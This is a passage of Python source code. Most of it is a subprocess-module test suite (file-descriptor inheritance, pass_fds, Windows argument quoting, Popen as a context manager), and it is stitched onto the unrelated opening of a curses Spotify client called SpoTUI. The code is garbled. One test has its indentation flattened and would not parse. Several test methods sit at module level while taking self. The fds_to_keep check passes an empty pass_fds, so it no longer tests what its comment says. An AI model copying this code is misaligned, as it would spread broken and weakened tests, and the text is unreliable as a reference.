                              stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE, close_fds=False)

        self.addCleanup(p1.communicate, b'')

        p2 = subprocess.Popen([sys.executable, fd_status],
                              stdout=subprocess.PIPE, close_fds=False)

        output, error = p2.communicate()
        result_fds = set(map(int, output.split(b',')))
        unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
                            p1.stderr.fileno()])

        self.assertFalse(result_fds & unwanted_fds,
                         "Expected no fds from %r to be open in child, "
                         "found %r" %
                              (unwanted_fds, result_fds & unwanted_fds))
    def test_pipe_cloexec_real_tools(self):
        # Chain two children through a pipe (cat | grep style); if pipe fds
        # leaked into the second child, the pipeline would hang on EOF.
        qcat = support.findfile("qcat.py", subdir="subprocessdata")
        qgrep = support.findfile("qgrep.py", subdir="subprocessdata")

        subdata = b'zxcvbn'
        data = subdata * 4 + b'\n'

        p1 = subprocess.Popen([sys.executable, qcat],
                              stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                              close_fds=False)

        p2 = subprocess.Popen([sys.executable, qgrep, subdata],
                              stdin=p1.stdout, stdout=subprocess.PIPE,
                              close_fds=False)

        self.addCleanup(p1.wait)
        self.addCleanup(p2.wait)
        def kill_p1():
            try:
                p1.terminate()
            except ProcessLookupError:
                pass
        def kill_p2():
            try:
                p2.terminate()
            except ProcessLookupError:
                pass
        self.addCleanup(kill_p1)
        self.addCleanup(kill_p2)

        p1.stdin.write(data)
        p1.stdin.close()

        # Bounded wait so a hung pipeline fails the test instead of blocking.
        readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)

        self.assertTrue(readfiles, "The child hung")
        self.assertEqual(p2.stdout.read(), data)

        p1.stdout.close()
        p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=())
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & fds_to_keep & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
    @unittest.skipIf(sys.platform.startswith("freebsd") and
                     os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
                     "Requires fdescfs mounted on /dev/fd on FreeBSD.")
    def test_close_fds_when_max_fd_is_lowered(self):
        """Confirm that issue21618 is fixed (may fail under valgrind)."""
        fd_status = support.findfile("fd_status.py", subdir="subprocessdata")

        # This launches the meat of the test in a child process to
        # avoid messing with the larger unittest processes maximum
        # number of file descriptors.
        #  This process launches:
        #  +--> Process that lowers its RLIMIT_NOFILE aftr setting up
        #    a bunch of high open fds above the new lower rlimit.
        #    Those are reported via stdout before launching a new
        #    process with close_fds=False to run the actual test:
        #    +--> The TEST: This one launches a fd_status.py
        #      subprocess with close_fds=True so we can find out if
        #      any of the fds above the lowered rlimit are still open.
        p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
        '''
        import os, resource, subprocess, sys, textwrap
        open_fds = set()
        # Add a bunch more fds to pass down.
        for _ in range(40):
            fd = os.open(os.devnull, os.O_RDONLY)
            open_fds.add(fd)

        # Leave a two pairs of low ones available for use by the
        # internal child error pipe and the stdout pipe.
        # We also leave 10 more open as some Python buildbots run into
        # "too many open files" errors during the test if we do not.
        for fd in sorted(open_fds)[:14]:
            os.close(fd)
            open_fds.remove(fd)
        for fd in open_fds:
            #self.addCleanup(os.close, fd)
            os.set_inheritable(fd, True)

        max_fd_open = max(open_fds)

        # Communicate the open_fds to the parent unittest.TestCase process.
        print(','.join(map(str, sorted(open_fds))))
        sys.stdout.flush()

        rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
        try:
            # 29 is lower than the highest fds we are leaving open.
            resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
            # Launch a new Python interpreter with our low fd rlim_cur that
            # inherits open fds above that limit.  It then uses subprocess
            # with close_fds=True to get a report of open fds in the child.
            # An explicit list of fds to check is passed to fd_status.py as
            # letting fd_status rely on its default logic would miss the
            # fds above rlim_cur as it normally only checks up to that limit.
            subprocess.Popen(
                [sys.executable, '-c',
                 textwrap.dedent("""
                     import subprocess, sys
                     subprocess.Popen([sys.executable, %r] +
                                      [str(x) for x in range({max_fd})],
                                      close_fds=True).wait()
                     """.format(max_fd=max_fd_open+1))],
                close_fds=False).wait()
        finally:
            resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
        ''' % fd_status)], stdout=subprocess.PIPE)

        output, unused_stderr = p.communicate()
        output_lines = output.splitlines()
        # Line 1: fds the middle process left open; line 2: fds still open
        # in the innermost child — the two sets must not intersect.
        self.assertEqual(len(output_lines), 2,
                         msg="expected exactly two lines of output:\n%r" % output)
        opened_fds = set(map(int, output_lines[0].strip().split(b',')))
        remaining_fds = set(map(int, output_lines[1].strip().split(b',')))

        self.assertFalse(remaining_fds & opened_fds,
                         msg="Some fds were left open.")
    # Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
    # descriptor of a pipe closed in the parent process is valid in the
    # child process according to fstat(), but the mode of the file
    # descriptor is invalid, and read or write raise an error.
    @support.requires_mac_ver(10, 5)
    def test_pass_fds(self):
        # pass_fds must keep exactly the listed fd open and close the rest.
        fd_status = support.findfile("fd_status.py", subdir="subprocessdata")

        open_fds = set()

        for x in range(5):
            fds = os.pipe()
            self.addCleanup(os.close, fds[0])
            self.addCleanup(os.close, fds[1])
            os.set_inheritable(fds[0], True)
            os.set_inheritable(fds[1], True)
            open_fds.update(fds)

        for fd in open_fds:
            p = subprocess.Popen([sys.executable, fd_status],
                                 stdout=subprocess.PIPE, close_fds=True,
                                 pass_fds=(fd, ))
            output, ignored = p.communicate()

            remaining_fds = set(map(int, output.split(b',')))
            to_be_closed = open_fds - {fd}

            self.assertIn(fd, remaining_fds, "fd to be passed not passed")
            self.assertFalse(remaining_fds & to_be_closed,
                             "fd to be closed passed")

            # pass_fds overrides close_fds with a warning.
            with self.assertWarns(RuntimeWarning) as context:
                self.assertFalse(subprocess.call(
                        [sys.executable, "-c", "import sys; sys.exit(0)"],
                        close_fds=False, pass_fds=(fd, )))
            self.assertIn('overriding close_fds', str(context.warning))
    def test_pass_fds_inheritable(self):
        # pass_fds must make even a non-inheritable fd survive into the
        # child, without flipping the flag in the parent.
        script = support.findfile("fd_status.py", subdir="subprocessdata")

        inheritable, non_inheritable = os.pipe()
        self.addCleanup(os.close, inheritable)
        self.addCleanup(os.close, non_inheritable)
        os.set_inheritable(inheritable, True)
        os.set_inheritable(non_inheritable, False)
        pass_fds = (inheritable, non_inheritable)
        args = [sys.executable, script]
        args += list(map(str, pass_fds))

        p = subprocess.Popen(args,
                             stdout=subprocess.PIPE, close_fds=True,
                             pass_fds=pass_fds)
        output, ignored = p.communicate()
        fds = set(map(int, output.split(b',')))

        # the inheritable file descriptor must be inherited, so its inheritable
        # flag must be set in the child process after fork() and before exec()
        self.assertEqual(fds, set(pass_fds), "output=%a" % output)

        # inheritable flag must not be changed in the parent process
        self.assertEqual(os.get_inheritable(inheritable), True)
        self.assertEqual(os.get_inheritable(non_inheritable), False)
    def test_stdout_stdin_are_single_inout_fd(self):
        # One read/write fd may legally serve as both stdout and stdin.
        with io.open(os.devnull, "r+") as inout:
            p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
                                 stdout=inout, stdin=inout)
            p.wait()
    def test_stdout_stderr_are_single_inout_fd(self):
        # One read/write fd may legally serve as both stdout and stderr.
        with io.open(os.devnull, "r+") as inout:
            p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
                                 stdout=inout, stderr=inout)
            p.wait()
    def test_stderr_stdin_are_single_inout_fd(self):
        # One read/write fd may legally serve as both stderr and stdin.
        with io.open(os.devnull, "r+") as inout:
            p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
                                 stderr=inout, stdin=inout)
            p.wait()
    def test_wait_when_sigchild_ignored(self):
        # NOTE: sigchild_ignore.py may not be an effective test on all OSes.
        # Popen.wait() must still work when the child ignores SIGCHLD.
        sigchild_ignore = support.findfile("sigchild_ignore.py",
                                           subdir="subprocessdata")
        p = subprocess.Popen([sys.executable, sigchild_ignore],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        stdout, stderr = p.communicate()
        self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
                         " non-zero with this error:\n%s" %
                         stderr.decode('utf-8'))
    def test_select_unbuffered(self):
        # Issue #11459: bufsize=0 should really set the pipes as
        # unbuffered (and therefore let select() work properly).
        select = support.import_module("select")
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys;'
                              'sys.stdout.write("apple")'],
                             stdout=subprocess.PIPE,
                             bufsize=0)
        f = p.stdout
        self.addCleanup(f.close)
        try:
            # After a partial read, the remaining byte must be immediately
            # visible to select() — buffering would hide it.
            self.assertEqual(f.read(4), b"appl")
            self.assertIn(f, select.select([f], [], [], 0.0)[0])
        finally:
            p.wait()
    def test_zombie_fast_process_del(self):
        # Issue #12650: on Unix, if Popen.__del__() was called before the
        # process exited, it wouldn't be added to subprocess._active, and would
        # remain a zombie.
        # spawn a Popen, and delete its reference before it exits
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys, time;'
                              'time.sleep(0.2)'],
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        ident = id(p)
        pid = p.pid
        # Dropping the last reference triggers __del__ (and a ResourceWarning
        # for the still-running child).
        with support.check_warnings(('', ResourceWarning)):
            p = None

        # check that p is in the active processes list
        self.assertIn(ident, [id(o) for o in subprocess._active])
    def test_leak_fast_process_del_killed(self):
        # Issue #12650: on Unix, if Popen.__del__() was called before the
        # process exited, and the process got killed by a signal, it would never
        # be removed from subprocess._active, which triggered a FD and memory
        # leak.
        # spawn a Popen, delete its reference and kill it
        p = subprocess.Popen([sys.executable, "-c",
                              'import time;'
                              'time.sleep(3)'],
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        ident = id(p)
        pid = p.pid
        with support.check_warnings(('', ResourceWarning)):
            p = None

        os.kill(pid, signal.SIGKILL)
        # check that p is in the active processes list
        self.assertIn(ident, [id(o) for o in subprocess._active])

        # let some time for the process to exit, and create a new Popen: this
        # should trigger the wait() of p
        time.sleep(0.2)
        with self.assertRaises(OSError) as c:
            with subprocess.Popen(['nonexisting_i_hope'],
                                  stdout=subprocess.PIPE,
                                  stderr=subprocess.PIPE) as proc:
                pass
        # p should have been wait()ed on, and removed from the _active list
        self.assertRaises(OSError, os.waitpid, pid, 0)
        self.assertNotIn(ident, [id(o) for o in subprocess._active])
    def test_close_fds_after_preexec(self):
        # Fds created by preexec_fn (here via dup2) must still be subject to
        # close_fds handling, i.e. closed before exec().
        fd_status = support.findfile("fd_status.py", subdir="subprocessdata")

        # this FD is used as dup2() target by preexec_fn, and should be closed
        # in the child process
        fd = os.dup(1)
        self.addCleanup(os.close, fd)

        p = subprocess.Popen([sys.executable, fd_status],
                             stdout=subprocess.PIPE, close_fds=True,
                             preexec_fn=lambda: os.dup2(1, fd))
        output, ignored = p.communicate()

        remaining_fds = set(map(int, output.split(b',')))

        self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
    # Issue #22290: fork_exec() must not crash on memory allocation failure
    # or other errors
    import _posixsubprocess
    gc_enabled = gc.isenabled()
    try:
        # Use a preexec function and enable the garbage collector
        # to force fork_exec() to re-enable the garbage collector
        # on error.
        func = lambda: None
        gc.enable()
        # Each tuple puts the wrong type (123) in one positional slot;
        # fork_exec must raise TypeError rather than crash.
        for args, exe_list, cwd, env_list in (
            (123, [b"exe"], None, [b"env"]),
            ([b"arg"], 123, None, [b"env"]),
            ([b"arg"], [b"exe"], 123, [b"env"]),
            ([b"arg"], [b"exe"], None, 123),
        ):
            with self.assertRaises(TypeError):
                _posixsubprocess.fork_exec(
                    args, exe_list,
                    True, (), cwd, env_list,
                    -1, -1, -1, -1,
                    1, 2, 3, 4,
                    True, True, func)
    finally:
        # restore the caller's GC state
        if not gc_enabled:
            gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
    # Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
    import _posixsubprocess

    class BadInt:
        # __int__ succeeds on the first call only, to exercise the
        # error path where conversion fails mid-validation.
        first = True

        def __init__(self, value):
            self.value = value

        def __int__(self):
            if self.first:
                self.first = False
                return self.value
            raise ValueError

    gc_enabled = gc.isenabled()
    try:
        gc.enable()
        # Every entry below violates the "sorted tuple of distinct,
        # in-range non-negative ints" contract in a different way.
        for fds_to_keep in (
            (-1, 2, 3, 4, 5),  # Negative number.
            ('str', 4),  # Not an int.
            (18, 23, 42, 2**63),  # Out of range.
            (5, 4),  # Not sorted.
            (6, 7, 7, 8),  # Duplicate.
            (BadInt(1), BadInt(2)),
        ):
            with self.assertRaises(
                    ValueError,
                    msg='fds_to_keep={}'.format(fds_to_keep)) as c:
                _posixsubprocess.fork_exec(
                    [b"false"], [b"false"],
                    True, fds_to_keep, None, [b"env"],
                    -1, -1, -1, -1,
                    1, 2, 3, 4,
                    True, True, None)
            self.assertIn('fds_to_keep', str(c.exception))
    finally:
        if not gc_enabled:
            gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
    """communicate() must swallow BrokenPipeError raised by stdin.close()."""
    # By not setting stdout or stderr or a timeout we force the fast path
    # that just calls _stdin_write() internally due to our mock.
    proc = subprocess.Popen([sys.executable, '-c', 'pass'])
    with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
        mock_proc_stdin.close.side_effect = BrokenPipeError
        proc.communicate()  # Should swallow BrokenPipeError from close.
        mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
    """communicate(input) must swallow BrokenPipeError from stdin.write()
    and still close stdin."""
    # By not setting stdout or stderr or a timeout we force the fast path
    # that just calls _stdin_write() internally due to our mock.
    proc = subprocess.Popen([sys.executable, '-c', 'pass'])
    with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
        mock_proc_stdin.write.side_effect = BrokenPipeError
        proc.communicate(b'stuff')  # Should swallow the BrokenPipeError.
        mock_proc_stdin.write.assert_called_once_with(b'stuff')
        mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
    """_communicate() must swallow BrokenPipeError from stdin.flush()."""
    # Setting stdin and stdout forces the ._communicate() code path.
    # python -h exits faster than python -c pass (but spams stdout).
    proc = subprocess.Popen([sys.executable, '-h'],
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE)
    with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
            open(os.devnull, 'wb') as dev_null:
        mock_proc_stdin.flush.side_effect = BrokenPipeError
        # because _communicate registers a selector using proc.stdin...
        mock_proc_stdin.fileno.return_value = dev_null.fileno()
        # _communicate() should swallow BrokenPipeError from flush.
        proc.communicate(b'stuff')
        mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
    """_communicate() with a timeout must swallow BrokenPipeError from
    stdin.close()."""
    # Setting stdin and stdout forces the ._communicate() code path.
    # python -h exits faster than python -c pass (but spams stdout).
    proc = subprocess.Popen([sys.executable, '-h'],
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE)
    with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
        mock_proc_stdin.close.side_effect = BrokenPipeError
        # _communicate() should swallow BrokenPipeError from close.
        proc.communicate(timeout=999)
        mock_proc_stdin.close.assert_called_once_with()
@unittest.skipIf(not ctypes, 'ctypes module required.')
@unittest.skipIf(not sys.executable, 'Test requires sys.executable.')
def test_child_terminated_in_stopped_state(self):
    """Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
    PTRACE_TRACEME = 0  # From glibc and MacOS (PT_TRACE_ME).
    libc_name = ctypes.util.find_library('c')
    libc = ctypes.CDLL(libc_name)
    if not hasattr(libc, 'ptrace'):
        raise unittest.SkipTest('ptrace() required.')
    # First verify ptrace(PTRACE_TRACEME) works at all in this environment.
    test_ptrace = subprocess.Popen(
        [sys.executable, '-c', """if True:
         import ctypes
         libc = ctypes.CDLL({libc_name!r})
         libc.ptrace({PTRACE_TRACEME}, 0, 0)
         """.format(libc_name=libc_name, PTRACE_TRACEME=PTRACE_TRACEME)
         ])
    if test_ptrace.wait() != 0:
        raise unittest.SkipTest('ptrace() failed - unable to test.')
    # Now crash a traced child; the kernel reports it stopped rather than
    # terminated, which wait() must cope with.
    child = subprocess.Popen(
        [sys.executable, '-c', """if True:
         import ctypes, faulthandler
         libc = ctypes.CDLL({libc_name!r})
         libc.ptrace({PTRACE_TRACEME}, 0, 0)
         faulthandler._sigsegv()  # Crash the process.
         """.format(libc_name=libc_name, PTRACE_TRACEME=PTRACE_TRACEME)
         ])
    try:
        returncode = child.wait()
    except Exception as e:
        child.kill()  # Clean up the hung stopped process.
        raise e
    self.assertNotEqual(0, returncode)
    self.assertLess(returncode, 0)  # signal death, likely SIGSEGV.
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
    """Windows-only subprocess behavior: startupinfo, creationflags, shell
    handling, and signal/kill semantics on live and already-dead children."""

    def test_startupinfo(self):
        # startupinfo argument
        # We uses hardcoded constants, because we do not want to
        # depend on win32all.
        STARTF_USESHOWWINDOW = 1
        SW_MAXIMIZE = 3
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.dwFlags = STARTF_USESHOWWINDOW
        startupinfo.wShowWindow = SW_MAXIMIZE
        # Since Python is a console process, it won't be affected
        # by wShowWindow, but the argument should be silently
        # ignored
        subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
                        startupinfo=startupinfo)

    def test_startupinfo_keywords(self):
        # startupinfo argument
        # We use hardcoded constants, because we do not want to
        # depend on win32all.
        # NOTE(review): constant is spelled STARTF_USERSHOWWINDOW here but
        # STARTF_USESHOWWINDOW above; both have value 1 so behavior is the
        # same — presumably a typo, verify against the Win32 API name.
        STARTF_USERSHOWWINDOW = 1
        SW_MAXIMIZE = 3
        startupinfo = subprocess.STARTUPINFO(
            dwFlags=STARTF_USERSHOWWINDOW,
            wShowWindow=SW_MAXIMIZE
        )
        # Since Python is a console process, it won't be affected
        # by wShowWindow, but the argument should be silently
        # ignored
        subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
                        startupinfo=startupinfo)

    def test_creationflags(self):
        # creationflags argument
        CREATE_NEW_CONSOLE = 16
        sys.stderr.write("    a DOS box should flash briefly ...\n")
        subprocess.call(sys.executable +
                        ' -c "import time; time.sleep(0.25)"',
                        creationflags=CREATE_NEW_CONSOLE)

    def test_invalid_args(self):
        # invalid arguments should raise ValueError
        # (preexec_fn and close_fds-with-redirection are POSIX-only)
        self.assertRaises(ValueError, subprocess.call,
                          [sys.executable, "-c",
                           "import sys; sys.exit(47)"],
                          preexec_fn=lambda: 1)
        self.assertRaises(ValueError, subprocess.call,
                          [sys.executable, "-c",
                           "import sys; sys.exit(47)"],
                          stdout=subprocess.PIPE,
                          close_fds=True)

    def test_close_fds(self):
        # close file descriptors
        rc = subprocess.call([sys.executable, "-c",
                              "import sys; sys.exit(47)"],
                             close_fds=True)
        self.assertEqual(rc, 47)

    def test_shell_sequence(self):
        # Run command through the shell (sequence)
        newenv = os.environ.copy()
        newenv["FRUIT"] = "physalis"
        p = subprocess.Popen(["set"], shell=1,
                             stdout=subprocess.PIPE,
                             env=newenv)
        with p:
            self.assertIn(b"physalis", p.stdout.read())

    def test_shell_string(self):
        # Run command through the shell (string)
        newenv = os.environ.copy()
        newenv["FRUIT"] = "physalis"
        p = subprocess.Popen("set", shell=1,
                             stdout=subprocess.PIPE,
                             env=newenv)
        with p:
            self.assertIn(b"physalis", p.stdout.read())

    def test_shell_encodings(self):
        # Run command through the shell (string)
        # with both Windows text encodings for pipes
        for enc in ['ansi', 'oem']:
            newenv = os.environ.copy()
            newenv["FRUIT"] = "physalis"
            p = subprocess.Popen("set", shell=1,
                                 stdout=subprocess.PIPE,
                                 env=newenv,
                                 encoding=enc)
            with p:
                self.assertIn("physalis", p.stdout.read(), enc)

    def test_call_string(self):
        # call() function with string argument on Windows
        rc = subprocess.call(sys.executable +
                             ' -c "import sys; sys.exit(47)"')
        self.assertEqual(rc, 47)

    def _kill_process(self, method, *args):
        # Helper: spawn a long-sleeping child, apply the given kill method
        # once it is up, and verify it died with a nonzero return code.
        # Some win32 buildbot raises EOFError if stdin is inherited
        p = subprocess.Popen([sys.executable, "-c", """if 1:
                             import sys, time
                             sys.stdout.write('x\\n')
                             sys.stdout.flush()
                             time.sleep(30)
                             """],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        with p:
            # Wait for the interpreter to be completely initialized before
            # sending any signal.
            p.stdout.read(1)
            getattr(p, method)(*args)
            _, stderr = p.communicate()
            self.assertStderrEqual(stderr, b'')
            returncode = p.wait()
        self.assertNotEqual(returncode, 0)

    def _kill_dead_process(self, method, *args):
        # Helper: the child exits on its own; the kill method applied to the
        # dead process must not raise, and the original exit code survives.
        p = subprocess.Popen([sys.executable, "-c", """if 1:
                             import sys, time
                             sys.stdout.write('x\\n')
                             sys.stdout.flush()
                             sys.exit(42)
                             """],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        with p:
            # Wait for the interpreter to be completely initialized before
            # sending any signal.
            p.stdout.read(1)
            # The process should end after this
            time.sleep(1)
            # This shouldn't raise even though the child is now dead
            getattr(p, method)(*args)
            _, stderr = p.communicate()
            self.assertStderrEqual(stderr, b'')
            rc = p.wait()
        self.assertEqual(rc, 42)

    def test_send_signal(self):
        self._kill_process('send_signal', signal.SIGTERM)

    def test_kill(self):
        self._kill_process('kill')

    def test_terminate(self):
        self._kill_process('terminate')

    def test_send_signal_dead(self):
        self._kill_dead_process('send_signal', signal.SIGTERM)

    def test_kill_dead(self):
        self._kill_dead_process('kill')

    def test_terminate_dead(self):
        self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
    """Module-level helpers: getoutput/getstatusoutput and __all__ hygiene."""

    def test_getoutput(self):
        self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
        self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
                         (0, 'xyzzy'))

        # we use mkdtemp in the next line to create an empty directory
        # under our exclusive control; from that, we can invent a pathname
        # that we _know_ won't exist.  This is guaranteed to fail.
        dir = None
        try:
            dir = tempfile.mkdtemp()
            name = os.path.join(dir, "foo")
            status, output = subprocess.getstatusoutput(
                ("type " if mswindows else "cat ") + name)
            self.assertNotEqual(status, 0)
        finally:
            if dir is not None:
                os.rmdir(dir)

    def test__all__(self):
        """Ensure that __all__ is populated properly."""
        intentionally_excluded = {"list2cmdline", "Handle"}
        exported = set(subprocess.__all__)
        possible_exports = set()
        import types
        for name, value in subprocess.__dict__.items():
            if name.startswith('_'):
                continue
            if isinstance(value, (types.ModuleType,)):
                continue
            possible_exports.add(name)
        self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
                     "Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
    """Re-run the whole ProcessTestCase suite with the select()-based
    selector forced in place of poll()."""

    def setUp(self):
        self.orig_selector = subprocess._PopenSelector
        subprocess._PopenSelector = selectors.SelectSelector
        ProcessTestCase.setUp(self)

    def tearDown(self):
        # restore the original selector before the base teardown
        subprocess._PopenSelector = self.orig_selector
        ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
    """Windows argument-quoting tests using a script path containing a
    space ("te st...py")."""

    def setUp(self):
        super().setUp()
        # create a throwaway script whose filename contains a space; it
        # echoes argc and the lowered argv so quoting mistakes are visible
        f, fname = tempfile.mkstemp(".py", "te st")
        self.fname = fname.lower ()
        os.write(f, b"import sys;"
                    b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
                 )
        os.close(f)

    def tearDown(self):
        os.remove(self.fname)
        super().tearDown()

    def with_spaces(self, *args, **kwargs):
        # run the script with one extra "ab cd" argument and check the
        # child saw exactly two argv entries
        kwargs['stdout'] = subprocess.PIPE
        p = subprocess.Popen(*args, **kwargs)
        with p:
            self.assertEqual(
                p.stdout.read ().decode("mbcs"),
                "2 [%r, 'ab cd']" % self.fname
            )

    def test_shell_string_with_spaces(self):
        # call() function with string argument with spaces on Windows
        self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
                                             "ab cd"), shell=1)

    def test_shell_sequence_with_spaces(self):
        # call() function with sequence argument with spaces on Windows
        self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)

    def test_noshell_string_with_spaces(self):
        # call() function with string argument with spaces on Windows
        self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
                                             "ab cd"))

    def test_noshell_sequence_with_spaces(self):
        # call() function with sequence argument with spaces on Windows
        self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
    """Popen used as a context manager: pipes closed, wait() called,
    errors propagated."""

    def test_pipe(self):
        with subprocess.Popen([sys.executable, "-c",
                               "import sys;"
                               "sys.stdout.write('stdout');"
                               "sys.stderr.write('stderr');"],
                              stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE) as proc:
            self.assertEqual(proc.stdout.read(), b"stdout")
            self.assertStderrEqual(proc.stderr.read(), b"stderr")

        # __exit__ must close both pipe ends
        self.assertTrue(proc.stdout.closed)
        self.assertTrue(proc.stderr.closed)

    def test_returncode(self):
        with subprocess.Popen([sys.executable, "-c",
                               "import sys; sys.exit(100)"]) as proc:
            pass
        # __exit__ calls wait(), so the returncode should be set
        self.assertEqual(proc.returncode, 100)

    def test_communicate_stdin(self):
        with subprocess.Popen([sys.executable, "-c",
                               "import sys;"
                               "sys.exit(sys.stdin.read() == 'context')"],
                              stdin=subprocess.PIPE) as proc:
            proc.communicate(b"context")
            self.assertEqual(proc.returncode, 1)

    def test_invalid_args(self):
        with self.assertRaises((FileNotFoundError, PermissionError)) as c:
            with subprocess.Popen(['nonexisting_i_hope'],
                                  stdout=subprocess.PIPE,
                                  stderr=subprocess.PIPE) as proc:
                pass

    def test_broken_pipe_cleanup(self):
        """Broken pipe error should not prevent wait() (Issue 21619)"""
        proc = subprocess.Popen([sys.executable, '-c', 'pass'],
                                stdin=subprocess.PIPE,
                                bufsize=support.PIPE_MAX_SIZE*2)
        proc = proc.__enter__()
        # Prepare to send enough data to overflow any OS pipe buffering and
        # guarantee a broken pipe error. Data is held in BufferedWriter
        # buffer until closed.
        proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
        self.assertIsNone(proc.returncode)
        # EPIPE expected under POSIX; EINVAL under Windows
        self.assertRaises(OSError, proc.__exit__, None, None, None)
        self.assertEqual(proc.returncode, 0)
        self.assertTrue(proc.stdin.closed)
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
MainForm.py | import sys
import time
import curses
from threading import Thread
from spotui.src.util import debounce
from spotui.src.Logging import logging
from spotui.src.spotifyApi import SpotifyApi
from spotui.src.TracksMenu import TracksMenu
from spotui.src.LibraryMenu import LibraryMenu
from spotui.src.PlaylistMenu import PlaylistMenu
from spotui.src.DeviceMenu import DeviceMenu
from spotui.src.SearchInput import SearchInput
from spotui.src.NowPlaying import NowPlaying
# Module import time; used by the status-poll loop to align its 1 s ticks.
starttime = time.time()
class MainForm:
    """Top-level curses controller for SpoTUI.

    Builds the UI components, maps key codes to handlers, polls the Spotify
    API for playback status on a background thread, and runs the blocking
    key-event loop in __init__ (the constructor does not return until the
    user exits).
    """

    def __init__(self, stdscr):
        self.stdscr = stdscr
        self.api = SpotifyApi()
        # While True, both the event loop and the status thread stop
        # refreshing (set while the search popup is open).
        self.pause_updates = False
        self.device_id = None
        self.tracklist_uri = None
        self.status = self.api.get_playing()
        self.app_name = "SpoTUI"

        # Events: key code -> handler callable
        self.events = {
            155: self.handle_exit,
            27: self.handle_exit,
            ord("q"): self.handle_exit,
            9: self.select_next_component,
            curses.KEY_RESIZE: self.handle_resize,
            ord("d"): self.show_device_menu,
            ord("/"): self.show_search_bar,
            ord(" "): self.toggle_playback,
            ord("p"): self.previous_track,
            ord("n"): self.next_track,
            ord("s"): self.toggle_shuffle,
            ord("r"): self.cycle_repeat,
            curses.KEY_RIGHT: self.seek_forward,
